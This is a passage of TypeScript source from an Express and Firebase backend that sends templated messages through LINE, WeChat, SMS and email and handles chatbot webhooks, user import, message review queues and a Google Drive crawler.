if (req.body.messageObj.hasOwnProperty("thumb")) {
thumb = req.body.messageObj.thumb
}
}
let messageRecord = {
id: messageRecordService.getMessageRecordUUID(),
sendCount: 0,
successCount: 0,
type: "text"
}
const pushMessagePromises = new Array<Promise<any>>()
if (sender.path)
sender.path = `(${sender.path})\n`
for (const receiver of receivers) {
memberService.getMemberById(receiver.id).then(async member => {
let formatedContent = content
if (receiver.hasOwnProperty("data")) {
if (receiver.data instanceof Array) {
for (let datum of receiver.data) {
if (receiver.hasOwnProperty("name")) {
datum['name'] = member.name
}
formatedContent = formatContentByMQ(content, datum)
}
} else {
// if (receiver.hasOwnProperty("name")) {
// receiver.data['name'] = member.name
// }
// formatedContent = formatContentByMQ(content, receiver.data)
}
}
if (req.body.hasOwnProperty("item")) {
formatedContent = formatItemContentByMQ(formatedContent, req.body.item.data)
formatedContent = formatedContent.replace(/{{item}}/g, req.body.item.name || "")
} else {
}
if (messageTemplate.channel == "WeChat") {
if (member.wechatId && member.wechatId !== "") {
// const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
const wechatMessages = toTemplateMessagesMQ(sender, member.wechatId, formatedContent, storageUrls, thumb)
if (wechatMessages) {
messageRecord.sendCount += 1
pushMessagePromises.push(
pushWechatMessages(wechatMessages)
.then(() => {
messageRecord.successCount += 1
return createChatMessage(sender, member, messageTemplate.channel, formatedContent, storageUrls, thumb)
})
.catch(() => {
return resolve()
})
)
}
}
}
if (messageTemplate.channel == "Line") {
// if (receiver.hasOwnProperty("groupId")) {
// member['lineId'] = receiver.groupId
// }
if (member.lineId && member.lineId !== "") {
// if (receiver.lineId.substring(0, 1) == "U") {
// const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
const lineMessage = toPersonMessage(sender, formatedContent, storageUrls, thumb, messageTemplate.type)
if (lineMessage) {
messageRecord.sendCount += 1
// console.log("lineMessage:", JSON.stringify(lineMessage, null, 4))
pushMessagePromises.push(
pushLineMessage(member.lineId, lineMessage)
.then(() => {
messageRecord.successCount += 1
return createChatMessage(sender, member, messageTemplate.channel, formatedContent, storageUrls, thumb)
})
.catch(() => {
return resolve()
})
)
}
// }
}
}
if (messageTemplate.channel == "SMS") {
const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
let smsMessage = toSMSMessage(sender, formatedContent)
if (member.mobilePhone && smsMessage) {
messageRecord.sendCount += 1
pushMessagePromises.push(
pushSMSMessage(member.mobilePhone, smsMessage)
.then(() => {
messageRecord.successCount += 1
return resolve()
})
.catch(() => {
return resolve()
})
)
}
}
if (messageTemplate.channel == "Email") {
const emailFiles = await getEmailFiles([])
const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
const emailmessage = await toEmailMessage(sender, formatedContent, messageRecord.id + trackId, emailFiles)
if (member.email && emailmessage) {
messageRecord.sendCount += 1
pushMessagePromises.push(
pushEmailMessage(member.email, emailmessage)
.then(() => {
messageRecord.successCount += 1
return resolve()
})
.catch(() => {
return resolve()
})
)
}
}
})
}
await Promise.all(pushMessagePromises).then(result => {
}).catch(error => {
console.log(error)
// res.sendStatus(500)
})
res.sendStatus(200)
})
router.post("/replyMessage", async (req, res, next) => {
const receiver = req.body.receiver as Member
const message = req.body.message as string
let storageUrls: MessageTemplate["urls"] = []
const staff = req.body.staff as Member
const channel = req.body.channel
if (req.body.hasOwnProperty("urls")) {
storageUrls = req.body.urls
}
console.log("receiver:", receiver)
console.log("message:", message)
console.log("staff:", staff)
console.log("channel:", channel)
const pushMessagePromises = new Array<Promise<any>>()
if (receiver && receiver != null) {
// let channel = ""
if (channel == "WeChat") {
const wechatMessages = toCustomTextMessage(receiver, message)
pushMessagePromises.push(pushCustomMessage(wechatMessages))
// const wechatMessages = toTemplateMessagesMQ(staff, receiver.wechatId, message, storageUrls, "")
// pushMessagePromises.push(pushWechatMessages(wechatMessages))
} else if (channel == "Line") {
let lineMessage = []
if (message != "") {
lineMessage.push(toLineTextMessage(staff, message))
}
if (storageUrls.length > 0) {
lineMessage = lineMessage.concat(toPersonMessage(staff, "", storageUrls, ""))
}
if (lineMessage.length > 0) {
pushMessagePromises.push(pushLineMessage(receiver.lineId, lineMessage))
}
// channel = "Line"
}
await Promise.all(pushMessagePromises).then(result => {
// console.log(JSON.stringify(result, null, 4))
createChatMessage(staff, receiver, channel, message, storageUrls, "")
res.sendStatus(200)
}).catch(error => {
console.log(error)
res.sendStatus(403)
})
} else {
res.sendStatus(403)
}
})
const formatContentByMQ = (message: string, data: any): string => {
let content = message
for (const key in data) {
const regex = new RegExp("{{" + key + "}}", "g")
const tmp = data[key]
if (typeof tmp == "number")
content = content.replace(regex, numberWithCommas(data[key]))
else
content = content.replace(regex, tmp)
}
return content
}
const formatItemContentByMQ = (message: string, data: any): string => {
let content = message
for (const key in data) {
const regex = new RegExp("{{" + key + "}}", "g")
const tmp = data[key]
if (typeof tmp == "number")
content = content.replace(regex, numberWithCommas(data[key]))
else
content = content.replace(regex, tmp)
}
return content
}
const createChatMessage = async (staff: Member, receiver: Member, channel: string, message: string, storageUrls: MessageTemplate["urls"], thumb: string) => {
// let memberSnapShot = await memberService.getMemberByAnyId(receiver)
// if (!memberSnapShot.empty) {
let userMessage: ChatMessage = {
id: receiver.id
}
if (channel == "Line") {
userMessage.id = receiver.lineId
} else if (channel == "WeChat") {
userMessage.id = receiver.wechatId
}
await chatMessageService.setChatMessage(userMessage)
const trackId = chatMessageService.getRecordDetailUUID(userMessage.id)
const recordDetail: RecordDetail = {
id: trackId,
receiver: receiver,
channel: channel as MessageTemplate['channel'],
message: message.replace(/\n/g, "\\n"),
urls: storageUrls || [],
thumb: thumb || "",
isSucceed: true,
receiveTime: new Date().getTime(),
read: true
}
return chatMessageService.setRecordDetail(userMessage.id, recordDetail)
// }
}
const getURLfromString = (message: string): string[] => {
const urlWithParamRegex = new RegExp(/[-\w@:%\+.~#?&/=]{2,256}\.[a-z]{2,4}([\/?&/@:%\+.~#=][-\w]*)*/gi)
// const regex = new RegExp(/[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi)
return urlWithParamRegex.exec(message)
}
const numberWithCommas = (x) => {
return x.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",")
}
export default router<file_sep>/src/authorizationSubscriber.ts
import { actionSubscriber } from './actionSubscriber'
import { pushMessage } from './services/chatbotService'
import * as chatMessageService from './services/chatMessageService'
import * as memberService from "./services/memberService"
import { ChatMessage, Member, RecordDetail, MemberOrganization } from './model';
import * as config from './config';
import { Client, Message, FlexComponent, FlexMessage, FlexBox } from "@line/bot-sdk"
const dialogflow = require('dialogflow');
const projectId = config.DialogFlow.projectId;
const languageCode = config.DialogFlow.languageCode;
const sessionClient = new dialogflow.SessionsClient({ keyFilename: config.dialogflowPath });
const detectIntent = (lineId: string, textMessage: string): Promise<any> => {
const sessionPath = sessionClient.sessionPath(projectId, lineId);
const request = {
session: sessionPath,
queryInput: {
text: {
text: textMessage,
languageCode: languageCode,
},
},
};
return sessionClient.detectIntent(request);
}
export const messageDispatcher = async (lineId: string, message: string): Promise<any> => {
let t1 = new Date()
return detectIntent(lineId, message).then(responses => {
let t2 = new Date()
console.log("DialogFlow spent: ", t2.getTime() - t1.getTime(), "ms")
const result = responses[0].queryResult;
if (result.intent) {
// match intent
let action = result.action
return authorization(lineId, action, result)
} else {
console.log("Missing result.intent")
return authorization(lineId, "unMatchOnce", null)
}
}).catch(error => {
console.log(`${lineId} Error in Dialogflow:${error}`);
return authorization(lineId, "dialogFlowError", null)
});
}
export const postbackDispatcher = async (userId: string, postback: any, params: any): Promise<any> => {
const action = postback.action.toString()
const type = postback.type || ""
const contents: FlexComponent[] = []
const greetingMessage = "學長您好!"
const studentGreetings = "學員您好!"
const thanksMessage = ",感謝您!"
// const agreeMessage = greetingMessage + "已收到您的回覆,感謝您的參與!"
// const declineMessage = greetingMessage + "已收到您無法參加的回覆,期待下次您的參與!"
const yesMessage = "參加"
const noMessage = "不克前往"
const systemMember: Member = { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "", role: "staff", unReadMessages: 0 }
let message = ""
let session = ""
let course: string[] = []
let flexMessage: FlexMessage = {
type: "flex",
altText: `回覆訊息`,
contents: {
type: "bubble",
body: {
type: "box",
layout: "vertical",
contents: contents
}
}
}
let memberSnapShot = await memberService.getMemberByAnyId(userId)
if (!memberSnapShot.empty) {
if (message != "") {
contents.push(
{
type: "box",
layout: "vertical",
contents: [
{ type: "separator" },
{
type: "text",
text: message,
size: "md",
margin: "md",
wrap: true
}
]
},
{
type: "separator",
margin: "md"
}
)
}
if (contents.length > 0) {
await pushMessage(userId, flexMessage).then(success => {
return chatMessageService.createChatMessage(systemMember, memberSnapShot.docs[0].data() as Member, "Line", message, [], "")
})
} else {
return Promise.resolve()
}
}
// return authorization(lineId, action, postback)
}
const addTextBox = function (message: string): FlexBox {
return {
type: "box",
layout: "vertical",
contents: [
{ type: "separator" },
{
type: "text",
text: message,
size: "md",
margin: "md",
wrap: true
}
]
}
}
const addRecordDetail = function (userId: string, qText: string): RecordDetail {
const trackId = chatMessageService.getRecordDetailUUID(userId)
return {
id: trackId,
receiver: { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "", role: "staff", unReadMessages: 0 },
channel: "Line",
message: qText.replace(/\n/g, "\\n"),
isSucceed: true,
receiveTime: new Date().getTime(),
read: false
}
}
const authorization = function async(lineId: string, action: string, dataResult: any) {
// dataResult from dialogflow result or postback data
console.log("In authorization: ", lineId)
if (action == "Default Fallback Intent") {
return actionSubscriber(lineId, "unMatchOnce", dataResult)
}
return actionSubscriber(lineId, action, dataResult)
}
<file_sep>/src/services/groupService.ts
import * as admin from 'firebase-admin';
import { Group } from '../model';
const groupCollection = admin.firestore().collection("Group");
export const getLineGroups = function () {
return groupCollection.where('type', '==', "group").get()
}
export const getGroupBylineId = function (companyName: string) {
return groupCollection.where("lineId", "==", companyName).get()
}
export const getGroupById = function (id: string) {
return groupCollection.where("id", "==", id).get()
}
export const getGroupByName = function (name: string) {
return groupCollection.where("name", "==", name).get()
}
export const setGroup = function (member: Group) {
return groupCollection.doc(member.id).set(member, { merge: true })
}
export const deleteGroup = function (id: string) {
return groupCollection.doc(id).delete()
}<file_sep>/src/services/eventService.ts
import * as admin from 'firebase-admin';
import { EventResult, Receiver } from "../model"
const eventCollection = admin.firestore().collection("Event");
export const createEvent = function (event: any) {
return eventCollection.doc(event.id).set(event, { merge: true })
}
export const updateEvent = (eventId: string, event: EventResult) => {
return eventCollection.doc(eventId).update(event)
}
export const createEventReceiver = (eventId: string, receiver: Receiver) => {
return eventCollection.doc(eventId).collection("Receiver").add(receiver)
}
export const getEvent = async (eventId: string): Promise<EventResult> => {
const snapshot = await eventCollection.doc(eventId).get();
if (snapshot.exists)
return snapshot.data() as EventResult;
return null;
}
export const getEventServices = async (eventId: string): Promise<Receiver[]> => {
const snapshot = await eventCollection.doc(eventId).collection("Receiver").get();
return snapshot.docs.map(doc => {
return doc.data() as Receiver;
});
}<file_sep>/src/userWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as XLSX from 'xlsx'
import * as admin from 'firebase-admin';
import * as userService from "./services/userService"
import { User, Group, BatchGroup } from "./model"
const router = Router()
router.post("/importUsers", async (req, res) => {
let base64String = req.body.file;
let base64Image = base64String.split(';base64,').pop();
/* data is a node Buffer that can be passed to XLSX.read */
let workbook = XLSX.read(base64Image, { type: 'base64' });
let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
let userUploads = new Array<User>()
for (let i = 1; i < data.length; i++) {
let cols = data[i]
if (cols.length >= 3) {
let newData = {
name: cols[0] || "",
email: cols[1] || "",
role: cols[2] || "staff"
}
userUploads.push({
id: uuidv4(),
name: newData.name.toString().trim(),
email: newData.email.toString().trim(),
role: newData.role.toString().trim() as User['role']
})
}
}
for (let userUpload of userUploads) {
/**
* 檢查User主檔是否存在
*/
await createUser(userUpload)
console.log("--------------------------------------------------")
}
res.sendStatus(200)
})
router.post("/createUser", async (req, res) => {
const content: User = req.body
console.log("createUser:", content)
let userUpload: User = {
id: uuidv4(),
name: content.name.toString().trim(),
email: content.email.toString().trim(),
role: content.role.toString().trim() as User['role']
}
let createResult = await createUser(userUpload).then(success => {
res.status(200).send(success)
}).catch(err => {
res.sendStatus(403)
})
console.log("--------------------------------------------------")
})
router.put("/updateUser", async (req, res) => {
const content: User = req.body
console.log("updateUser:", content)
let userUpload: User = {
id: content.id.toString().trim(),
name: content.name.toString().trim(),
email: content.email.toString().trim(),
role: content.role.toString().trim() as User['role']
}
/**
* 檢查User主檔是否存在
*/
const userSnapshot = await userService.getUserById(userUpload.id)
if (!userSnapshot || userSnapshot == null) {
console.log("====User不存在====")
// 不存在則建立User
if (!userUpload.id || userUpload.id == "") {
userUpload.id = uuidv4()
}
} else {
let user = userSnapshot
if (userUpload.email && userUpload.email !== "") {
user.email = userUpload.email
}
if (userUpload.name && userUpload.name !== "") {
user.name = userUpload.name
}
if (userUpload.role) {
user.role = userUpload.role
}
await userService.setUser(user)
}
console.log("--------------------------------------------------")
res.sendStatus(200)
})
router.delete("/deleteUser/:userId", async (req, res) => {
const userId: string = req.params.userId || ""
console.log("deleteUser:", userId)
/**
* 檢查User主檔是否存在
*/
const userSnapshot = await userService.getUserById(userId.toString().trim())
if (!userSnapshot || userSnapshot == null) {
console.log("====User不存在====")
res.sendStatus(403)
} else {
let user = userSnapshot
await userService.deleteUser(user.id)
await deleteFirebaseAccount(userId).then(success => {
res.status(200).send(success)
}).catch(err => {
res.sendStatus(403)
})
}
console.log("--------------------------------------------------")
})
function createFirebaseAccount(email: string, password: string, name: string) {
return admin.auth().createUser({
email: email,
password: <PASSWORD>,
displayName: name
});
}
function deleteFirebaseAccount(uid: string) {
return admin.auth().deleteUser(uid)
}
function getFirebaseAccount(email: string) {
return admin.auth().getUserByEmail(email)
}
function createUser(userUpload: User) {
return new Promise(async (resolve, reject) => {
const userSnapshot = await userService.getUserByEmail(userUpload.email)
if (userSnapshot.empty) {
console.log("====User不存在====")
// 不存在則建立User
let getAuthResult = await getFirebaseAccount(userUpload.email).catch(error => {
// console.log("getAuthResult error:", error)
})
if (!getAuthResult || getAuthResult == null) {
let firebaseAuthInfo = await createFirebaseAccount(userUpload.email, uuidv4(), userUpload.name).catch(error => {
// console.log("firebaseAuth error:", error)
reject()
})
if (firebaseAuthInfo && firebaseAuthInfo != null) {
// console.log("firebaseAuthInfo:", firebaseAuthInfo)
userUpload.id = firebaseAuthInfo.uid
await userService.setUser(userUpload)
}
} else {
// console.log("getAuthResult:", getAuthResult)
userUpload.id = getAuthResult.uid
await userService.setUser(userUpload)
}
} else {
// userUpload = userSnapshot.docs[0].data() as User
// if (userUpload.email && userUpload.email !== "") {
// userUpload.email = userUpload.email.trim()
// }
}
resolve(userUpload);
})
}
export default router<file_sep>/src/services/smsService.ts
import Axios from "axios"
import { every8dConfig } from "../config"
import { Member } from "../model"
export const pushMessage = (mobilePhone: string, message: string): Promise<any> => {
const apiUrl = "https://oms.every8d.com/API21/HTTP/sendSMS.ashx"
return Axios.get(apiUrl, {
params: {
UID: every8dConfig.UID,
PWD: <PASSWORD>,
DEST: mobilePhone,
MSG: message
}
})
}
export const toSMSMessage = (sender: Member, message: string): string | null => {
if (message) {
let smsMessage = `《來自${sender.name}》\n`
if (sender.path)
smsMessage += sender.path + "\n"
return smsMessage + message
}
return null
}<file_sep>/src/reviewMessageWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as PubSub from "@google-cloud/pubsub"
import * as Moment from "moment-timezone"
import * as Queue from "bull"
import * as reviewMessageService from "./services/reviewMessageService"
import * as eventService from "./services/eventService"
import { User, ReviewMessage, Receiver, EventResult } from "./model"
import { pubsubConfig, MODE, redisConfig } from './config'
const queue = new Queue(redisConfig.name, { redis: redisConfig })
const pubsub = PubSub({ keyFilename: pubsubConfig.serviceAccountPath })
const router = Router()
router.post("/createReviewMessage", async (req, res) => {
let reviewMessage = req.body as ReviewMessage & { receivers: Receiver[] } //{ receivers: { id: string, data: any[] }[] }
if (reviewMessage) {
const now = new Date().getTime()
if (reviewMessage.expectTime > now) {
const newReviewMessage = {
id: uuidv4(),
state: 0,
content: reviewMessage.content,
channel: reviewMessage.channel,
sender: reviewMessage.sender,
expectTime: reviewMessage.expectTime,
urls: reviewMessage.urls,
type: reviewMessage.type,
auditor: null,
receiverCount: reviewMessage.receivers.length
} as ReviewMessage
await reviewMessageService.createReviewMessage(newReviewMessage).then(async success => {
const promiseArr = new Array<Promise<any>>()
for (let index = 0; index < reviewMessage.receivers.length; index++) {
let receiver = reviewMessage.receivers[index]
receiver['index'] = index + 1
promiseArr.push(reviewMessageService.createReviewMessageReceivers(newReviewMessage.id, receiver))
}
await Promise.all(promiseArr)
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
// for (let index = 0; index < 50; index++) {
// newReviewMessage.id = uuidv4()
// await reviewMessageService.createReviewMessage(newReviewMessage).then(async success => {
// const promiseArr = new Array<Promise<any>>()
// for (const receiver of reviewMessage.receivers)
// promiseArr.push(reviewMessageService.createReviewMessageReceivers(newReviewMessage.id, receiver))
// await Promise.all(promiseArr)
// }).catch(err => {
// res.sendStatus(403)
// })
// }
// res.sendStatus(200)
} else
res.status(403).send("The expect time is over")
} else {
res.sendStatus(403)
}
})
router.post("/updateReviewMessage", async (req, res) => {
const reviewMessageUpload = req.body as ReviewMessage
console.log(JSON.stringify(reviewMessageUpload, null, 4))
if (reviewMessageUpload && reviewMessageUpload != null) {
const newReviewMessage: ReviewMessage = {
...reviewMessageUpload
}
await reviewMessageService.setReviewMessage(newReviewMessage).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
} else {
res.sendStatus(403)
}
})
router.put("/updateReviewMessageState/:reviewMessageId/:state", async (req, res) => {
const id = req.params.reviewMessageId as string
const state = parseInt(req.params.state)
let reviewMessage = await reviewMessageService.getReviewMessageById(id)
if (reviewMessage) {
let newReviewMessage = {
id, state
} as ReviewMessage
await reviewMessageService.setReviewMessage(newReviewMessage)
res.sendStatus(200)
} else
res.sendStatus(403)
})
router.delete("/deleteReviewMessage/:reviewMessageId", async (req, res) => {
const id = req.params.reviewMessageId as string
await reviewMessageService.deleteReviewMessage(id).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.post("/reject/:reviewMessageId", async (req, res) => {
const id = req.params.reviewMessageId as string
const author: User = req["user"]
let reviewMessage = await reviewMessageService.getReviewMessageById(id)
if (reviewMessage) {
let newReviewMessage = {
id: reviewMessage.id,
state: 3,
auditor: author
} as ReviewMessage
await reviewMessageService.setReviewMessage(newReviewMessage)
res.sendStatus(200)
} else
res.sendStatus(403)
})
router.post("/agree/:reviewMessageId", async (req, res) => {
const id = req.params.reviewMessageId as string
const author: User = req["user"]
let reviewMessage = await reviewMessageService.getReviewMessageById(id)
if (reviewMessage) {
let newReviewMessage = {
id: reviewMessage.id,
state: 1,
auditor: author
} as ReviewMessage
await reviewMessageService.setReviewMessage(newReviewMessage).then(async success => {
// const moment = Moment(newReviewMessage.expectTime, "yyyy-MM-DD HH:mm:ss").tz("Asia/Taipei")
const moment = Moment(reviewMessage.expectTime)//.tz("Asia/Taipei")
const ss = 0//moment.second()
const mm = moment.minute()
const hh = moment.hour()
const dd = moment.date()
const mon = moment.month() + 1
const yy = moment.year()
const cron = ss + " " + mm + " " + hh + " " + dd + " " + mon + " * " + yy
console.log(cron)
if (reviewMessage.type.toLowerCase() == "delay") {
const result = await queue.add({
id: reviewMessage.id,
timeStamp: new Date().getTime()
}, { // 秒 分 時 日 月 年
repeat: { cron: cron },
jobId: reviewMessage.id//uuidv4()
})
} else if (reviewMessage.type.toLowerCase() == "immediate") {
let newEvent: EventResult = {
id: uuidv4(),
messageId: [],
content: reviewMessage.content,
urls: reviewMessage.urls || [],
channel: reviewMessage.channel,
sender: reviewMessage.sender,
// receivers: await reviewMessageService.getReviewMessageReceivers(reviewMessage.id),
timeStamp: new Date().getTime()
}
await eventService.createEvent(newEvent)
const receivers = await reviewMessageService.getReviewMessageReceivers(reviewMessage.id)
const memberCheckExecu = new Array<Promise<any>>()
for (const receiver of await receivers)
memberCheckExecu.push(eventService.createEventReceiver(newEvent.id, receiver))
await Promise.all(memberCheckExecu)
const data = Buffer.from(JSON.stringify({
id: newEvent.id,
timeStamp: newEvent.timeStamp
}))
console.log("pub data", {
id: newEvent.id,
timeStamp: newEvent.timeStamp
})
await pubsub.topic(pubsubConfig.topicName + pubsubConfig.messageTopicName).publisher().publish(data)
newReviewMessage.state = 2
await reviewMessageService.setReviewMessage(newReviewMessage)
}
res.status(200).send(cron)
}).catch(err => {
console.log("sending failed", err)
res.sendStatus(403)
})
} else {
console.log("review message not found")
res.sendStatus(403)
}
})
export default router<file_sep>/src/chatbotWS.ts
import { Router } from "express"
import * as Line from '@line/bot-sdk';
import { LINE, monitorGroupId, wechatAccount, uriName, appName } from './config';
import { Stream } from 'stream';
import * as fs from 'fs'
import axios from "axios"
import * as wechat from 'wechat'
import { createHash } from "crypto"
import * as mime from "mime"
import { messageDispatcher, postbackDispatcher } from './authorizationSubscriber'
import { getMemberByAnyId, setMember, deleteFirebaseToken } from './services/memberService';
import * as lineService from './services/lineService';
const queryString = require('query-string');
let path = require("path");
const router = Router()
router.post('/lineWebhook', (req, res) => {
console.log("webhook");
const signature = req.headers["x-line-signature"];
if (Line.validateSignature(JSON.stringify(req.body), LINE.channelSecret, signature as string)) {
const events = req.body.events;
let responseArray: Promise<any>[] = [];
let t2, t3;
events.forEach(async (event) => {
console.log(JSON.stringify(event, null, 4));
console.log("event.type", event.type)
let lineId = event.source.userId
let fileName = ""
switch (event.type) {
case 'follow':
messageDispatcher(lineId, "註冊")
break;
case 'unfollow':
// responseArray.push(memberUnfollow(lineId))
break;
case 'message':
if (event.source.type == 'user') {
// from user in line@, not from group
switch (event.message.type) {
case "text":
responseArray.push(messageDispatcher(lineId, event.message.text))
break;
case "sticker":
break;
case "file":
case "image":
case "video":
case "audio":
if (event.message.hasOwnProperty('fileName')) {
fileName = event.message.fileName.substring(0, event.message.fileName.lastIndexOf("."))
} else {
fileName = event.message.id
}
const result = await axios.get(`https://api.line.me/v2/bot/message/${event.message.id}/content`, {
responseType: "stream",
headers: {
"Authorization": "Bearer " + LINE.channelAccessToken,
}
}).catch(error => {
if (error.hasOwnProperty("response")) {
if (error.response.hasOwnProperty("status")) {
console.log("Get content failed with status code:", error.response.status + error.response.statusText)
} else {
console.log("Get content failed with no status code")
}
} else {
console.log("Get content failed with no response")
}
return null
})
if (result != null) {
const stream = result.data as Stream
console.log(result.headers['content-type']);
let msg = result.headers['content-type'];
let extention = mime.getExtension(result.headers['content-type'])
let length = result.headers['content-length'];
console.log("length:", length)
if (length > 10485760) {
console.log("很抱歉,您傳送的檔案超過 10 MB,目前無法接收。請您留言需要協助的事項,我們會儘快跟您聯絡。謝謝您!");
} else {
let buffer = new Buffer(0);
stream.on('data', (chunk) => {
buffer = Buffer.concat([buffer, chunk]);
if (buffer.length >= length) {
fs.writeFileSync('lib/' + Date.now() + fileName + "." + extention, buffer);
}
});
stream.on('error', (err) => {
console.log(err);
});
}
}
break;
case "location":
break;
default:
break;
}
}
console.log(lineId + " " + event.message.text)
break;
case 'postback':
const postback = queryString.parse(event.postback.data)
responseArray.push(postbackDispatcher(lineId, postback, event.postback.params))
break
case 'join':
let groupWelcome: Line.Message = {
"type": "template",
"altText": "This is a buttons template",
"template": {
"type": "buttons",
"text": `我是《${appName}》很高興受邀加入貴群組,請你填表幫我長智慧,讓我知道這個群組的相關資`,
"actions": [
{
"type": "uri",
"label": "點選前往",
"uri": `${uriName}groupBinding/${event.source.groupId}`
}
]
}
}
lineService.pushMessage(event.source.groupId, groupWelcome)
break
default:
break;
}
});
t2 = new Date();
Promise.all(responseArray)
.then(() => {
t3 = new Date();
console.log("Webhook Response Time:", t3.getTime() - t2.getTime());
res.status(200).send("OK")
})
.catch(err => {
console.log(err);
res.status(200).send("not OK");
});
} else {
res.status(200).send("OK")
}
}); // end of lineWebhook
router.use('/wechatWebhook', wechat(wechatAccount.callbackToken, function (req, res) {
console.log("wechatwebhook:", req.body);
let responseArray: Promise<any>[] = [];
let arr = [];
let t1, t2, t3;
t1 = new Date();
if (req.method.toLowerCase() === "get") {
const shasum = createHash("sha1")
shasum.update([wechatAccount.callbackToken, req.query.timestamp, req.query.nonce].sort().join(""))
const signature = shasum.digest("hex")
if (signature !== req.query.signature)
return res.status(403).end()
else
res.status(200).send(req.query.echostr)
} else {
const event = req.weixin
const userId = event.FromUserName
console.log(JSON.stringify(event, null, 4))
switch (event.MsgType) {
case "event":
switch (event.Event) {
case "subscribe":
console.log("follow*---------")
messageDispatcher(userId, "註冊")
break
case "unsubscribe":
responseArray.push(memberUnfollow(userId))
break
case "CLICK":
switch (event.EventKey) {
default:
break
}
break;
}
break
case "text":
responseArray.push(messageDispatcher(userId, event.Content))
break
}
res.reply("")
}
t2 = new Date();
Promise.all(arr)
.then(() => {
t3 = new Date();
console.log("D2:", t3.getTime() - t2.getTime());
})
.catch(err => {
console.log(err);
});
})); // end of wechatWebhook
router.use('/wechatRedir', async function (req, res) {
if (req.hasOwnProperty("body")) {
console.log('Has body wechatRedir.html:', req.body)
} else {
console.log('Request body not found wechatRedir.html:')
}
res.sendFile(path.join(__dirname + '/../serviceAccount/wechatRedir.html'));
})
const memberUnfollow = (lineId: string): Promise<any> => {
return getMemberByAnyId(lineId).then(result => {
if (!result.empty) {
let user = result.docs[0].data() as any
// sendToBigQuery(lineId, user.name, user.divsionName, "unfollow")
if (!user["unfollow"] || user["unfollow"] == false) {
user["unfollow"] = true
setMember(user)
deleteFirebaseToken(user.lineId).then((result: any) => {
console.log(`${user.name} unfollowed`)
return lineId
}).catch((error: any) => {
console.log("unfollow error:", error)
return null
})
}
} else
// sendToBigQuery(lineId, "未註冊", "未註冊", "unfollow")
return null
})
}
export default router<file_sep>/src/services/loginService.ts
import axios from 'axios'
import * as memberService from './memberService';
import * as sheetService from './sheetService'
export const appendCustomer = async (result) => {
let auth = await sheetService.authorize()
let range = encodeURI('users!A2:E')
return sheetService.appendSheet(auth, "19k-1kkOUORnJzIGBHJbpXqPaxrs3zTgZeX_LA3ZOMp4", range, result)
}
export const tempLogin = async function (personalId, password, lineId) {
return new Promise<any>(async (resolve, reject) => {
memberService.getMemberByMobilePhone(password).then(result => {
if (!result.empty) {
let data = result.docs[0].data()
console.log(data)
resolve(data)
} else {
reject("手機輸入錯誤!")
}
})
})
}<file_sep>/src/services/chatMessageService.ts
import * as admin from 'firebase-admin';
import { ChatMessage, RecordDetail, Member, MessageTemplate } from '../model';
const chatMessageCollection = admin.firestore().collection("ChatMessage");
export const getChatMessageUUID = (): string => {
return chatMessageCollection.doc().id
}
export const setChatMessage = (chatMessage: ChatMessage) => {
return chatMessageCollection
.doc(chatMessage.id)
.set(chatMessage, { merge: true })
}
export const getRecordDetailUUID = (chatMessageId: string): string => {
return chatMessageCollection.doc(chatMessageId).collection("RecordDetail").doc().id
}
export const setRecordDetail = (messageRecordId: string, recordDetail: RecordDetail) => {
return chatMessageCollection
.doc(messageRecordId)
.collection("RecordDetail")
.doc(recordDetail.id)
.set(recordDetail, { merge: true })
}
export const getChatMessages = () => {
return chatMessageCollection.get()
}
export const getChatMessageById = (chatMessageId: string) => {
return chatMessageCollection.doc(chatMessageId).get()
}
export const getRecordDetails = (chatMessageId: string) => {
return chatMessageCollection
.doc(chatMessageId)
.collection("RecordDetail")
.get()
}
export const getRecordDetailById = (chatMessageId: string, recordDetailId: string) => {
return chatMessageCollection.doc(chatMessageId)
.collection("RecordDetail").doc(recordDetailId)
.get()
}
export const createChatMessage = async (staff: Member, receiver: Member, channel: string, message: string, storageUrls: MessageTemplate["urls"], thumb: string) => {
// let memberSnapShot = await memberService.getMemberByAnyId(receiver)
// if (!memberSnapShot.empty) {
let userMessage: ChatMessage = {
id: receiver.id,
sender: receiver
}
if (channel == "Line") {
userMessage.id = receiver.lineId
} else if (channel == "WeChat") {
userMessage.id = receiver.wechatId
}
await setChatMessage(userMessage)
const trackId = getRecordDetailUUID(userMessage.id)
const recordDetail: RecordDetail = {
id: trackId,
receiver: receiver,
channel: channel as MessageTemplate['channel'],
message: message.replace(/\n/g, "\\n"),
urls: storageUrls || [],
thumb: thumb || "",
isSucceed: true,
receiveTime: new Date().getTime(),
read: true
}
return setRecordDetail(userMessage.id, recordDetail)
// }
}<file_sep>/src/driveCrawler.ts
import { Router } from "express"
import * as config from './config';
import * as googleDrive from "./services/driveService"
var fs = require('fs');
const router = Router()
router.post('/crawler', async function (req, res) {
console.log("crawler");
const auth = await googleDrive.authorize();
let t1, t2, t3;
t1 = new Date();
const now = +Date.now()
await googleDrive.rename({
"name": config.rootFolderName,
"sid": 0,
"fullName": config.rootFolderName,
"parents": config.publicFolderId,
"parentsName": [
{
"name": "Module",
"fullName": "Module",
"id": config.publicFolderId
}
],
"id": config.rootFolderId,
"docId": config.rootFolderId,
"mimeType": "application/vnd.google-apps.folder",
modifiedDate: 9999999999999,
modifiedTime: 9999999999999,
createdTime: 9999999999999
})
let fileList = await googleDrive.listFiles(auth, config.rootFolderId, [{ fullName: config.rootFolderName, name: config.rootFolderName, id: config.rootFolderId }], now)
.catch(err => {
console.log("error:", err)
res.status(403).send("list file failed")
})
await googleDrive.deleteFilesForSync(200, now, config.rootFolderId).catch(err => {
console.log("error:", err)
// res.status(403).send("delete file failed")
})
t2 = new Date();
